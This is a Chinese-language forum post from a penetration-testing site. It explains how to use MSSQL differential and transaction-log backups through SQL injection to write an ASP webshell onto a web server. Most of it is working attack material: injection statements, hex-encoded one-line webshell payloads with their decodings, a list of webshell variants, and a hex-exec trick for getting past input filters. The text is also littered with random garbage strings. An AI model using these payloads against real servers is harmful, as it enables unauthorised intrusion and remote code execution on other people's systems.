中国网络渗透测试联盟

标题: MSsql差异备份总结 [打印本页]

---

作者: admin    时间: 2012-9-13 17:21
标题: MSsql差异备份总结
差异备份的流程大概这样：
1.完整备份一次(保存位置当然可以改)
backup database 库名 to disk = 'c:\ddd.bak';--
0 g, X: K; y: ~; E+ f1 @) {
2.创建表并插曲入数据
create table [dbo].[dtest] ([cmd] [image]);
insert into dtest(cmd) values(0x3C25657865637574652872657175657374282261222929253E);--

/ J7 ~- N% @! O- a% s5 g3 w3.进行差异备份
backup database 库名 to disk='目标位置\d.asp' WITH DIFFERENTIAL,FORMAT;--
7 L( N6 m1 \4 N3 v4 r3 y
上面
, `3 G9 W& G2 B+ H9 [0x3C25657865637574652872657175657374282261222929253E
3 k7 o4 b; R( ~& a% V6 p! Q. q2 v就是一句话木马的内容：<%execute(request("a"))%>

6 U0 v; y/ U5 w2 J如下是网上常见的差异备份代码，思路一样！
===================================================
利用差异备份提高提高backupwebshell的成功率,减少文件大小
7 o7 f1 p# R; R' f; B1 ~* K步骤:

# t; B8 ?  p" b* h; B# hdeclare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s  --备份数据库

create table [dbo].[xiaolu] ([cmd] [image]);  -- 创建一个表

9 O! E" p$ G% `% Q2 z) J/ b3 f1 p& }
insert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)  --将一句话木马的16进制字符插入到表中

declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH DIFFERENTIAL,FORMAT  --对数据库实行差异备份
) M) a7 p( D! A, f
drop table [xiaolu]  -- 删除此表。

0x77006F006B0061006F002E00620061006B00为wokao.bak
  e8 R# F6 D; F7 O2 P! W0x3C25657865637574652872657175657374282261222929253E是<%execute(request("a"))%>
) q  c6 s1 F2 s6 R  M0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000是e:\web\wokao.asp
% L1 t$ d. v, F/ h" {
声明：方法不是我想的，我只是写工具，默认得到shell是
) B% ^! ?8 S. w6 f; k/ b<%execute(request("a"))%>
6 X1 @% F5 e9 G1 {$ l  X  l===============================================================

5 S! h5 ~) W& G. {2 C2 v! S2 y我发现上面代码，有时会无效，而直接用

9 ?; R* x: B% u) Z, V3 ibackup database 库名 to disk = 'c:\ddd.bak'

6 C: Y/ E3 a* Z1 `# [create table [dbo].[dtest] ([cmd] [image]);
! p8 c* B9 `2 n- L
& _5 c1 ]: R8 }insert into dtest(cmd) values(0x3C25657865637574652872657175657374282261222929253E)

- T  g: T* H2 _5 y' Sbackup database 库名 to disk='目标位置\d.asp' WITH DIFFERENTIAL,FORMAT;--
3 |: S1 J% C# Z* |
却可以成功，所以把最原始的方法写出来！思路是前人所创,这不说大家也知道的！
; c( a% f( n- W; B  }
' S0 U5 e6 t( Z" ]库名 必须要有效的库名，一般注入工具都可以得到！如果某站过滤 "‘",就要把字符内容转为数值了！

; W) D  P8 X7 P: D$ j  S( I网上还有log增量备份的，我也把他记录一下
" q* _) n: F0 b8 z$ g6 [$ t0 v* N=====================================================
  X( r/ L  m. [; p: y另一种log增量备份技术:

6 u) s# L9 p0 H( g6 q3 `';alter database null set RECOVERY FULL--

';create table cmd (a image)--

';backup log null to disk = 'f:\cmd' with init--
4 y( z" W; l8 n1 R& R
5 G; c! j8 Z# F; b$ r( U' ~';insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--

, N2 i9 u! a2 Z  S) l* j2 E6 W';backup log null to disk = '备份路径'--
  }, g# a0 K) X: X2 {2 e
0 F. {) I# d! G, E* o- j';drop table cmd--

';alter database XXX set RECOVERY SIMPLE--
4 B/ J" ~7 `. o9 x" R3 e5 l" V
PS:0x3C2565786563757465287265717565737428226122292
9253EDA 是一句话小马16进制转来的
: N( A! J& B+ ^+ ?( ]1 [
说到一句话马，还可以有这么几种写法：

6 K* \6 m1 _) L, S: _! Wa)<%%25Execute(request("a"))%%25>
b)<%Execute(request("a"))%>
! E+ F, D: Z( {  i. j: c5 lc)%><%execute request("a")%><%
d)<script language=VBScript runat=server>execute request("a")</script>
8 o5 _1 b& c' A( f/ b" N; [8 he)<%25Execute(request("a"))%25>
# ?! _  }( u4 r$ `3 q( p1 h$ Ff)<%eval(request("a")):response.end%> 备分专用一句话   (也就是插入一句话后所有的代码都无效,在一句话这里打止)
: _3 z4 q8 n) w2 R+ V" y; f9 h, vg)"%><%eval (request (chr(309)))%><%'" 网站配置版权信息插马专用一句话
* r3 R5 I* o1 g+ N8 e/ E6 ph)<%On Error Resume Next:response.clear:execute request("value"):response.End%>
5 e* h/ b. {! S! [5 y/ w- R7 qI)<%eval request(0)%>
J)"%><%Eval Request(0)%> 网站配置版权信息插马专用一句话

9 v( b# t$ E" h2 g$ m=============================================

6 S; {; R; c, w' c4 s2 [2 ~当遇到差备过滤了/时用这个语句代替

declare @a varchar(1024);set @a=cast(0x65786563206D6D as varchar(1024));exec (@a);--

把要执行的语句转16进制然后用exec执行
  L( _  T4 [% `- r) l2 }

9 [. h4 Q1 ^& A, W! W; r/ L减少备份文件大小方法如下:
' g5 A3 s# j2 }& R
! ]& |' a! |& [7 h7 r: F总的来说就是那么简单几句,下面以备份数据库model为例子
1
5 \9 z. z1 T1 O5 X2 v0 f; Wid=1;use model create table cmd(str image);insert into cmd(str) values ('<%25execute(request("a"))%25>')
/ V: O* W# o: `1 L2
8 o! {/ K6 [( Tid=1;backup database model to disk='你的路径‘ with differential,format;--
3 I" N3 X# {: m  Z6 x


SQL语句清理日志
注：test为数据库名

" N9 ?. y5 L( Y6 `7 I--清空日志
DUMP TRANSACTION test WITH NO_LOG
4 i* o9 B) ~: {% \- j6 u4 {" @" t
6 u0 a7 I8 o- ~/ S: o/ i6 ~--截断事务日志
BACKUP LOG test WITH NO_LOG

. G  s* t. k3 U: P' m--收缩数据库
DBCC SHRINKDATABASE(test)

--收缩指定数据文件,1是文件号,可以通过这个语句查询到
) o. z6 d# L  G( J* gSelect * from sysfiles DBCC SHRINKFILE(1)
/ d2 P3 f* @& G1 j
2 ]+ N3 t4 t. ~! S' r--以后能自动收缩
, r( g7 x1 F+ z% gEXEC sp_dboption 'test', 'autoshrink', 'TRUE'

---

欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)

Powered by Discuz! X3.2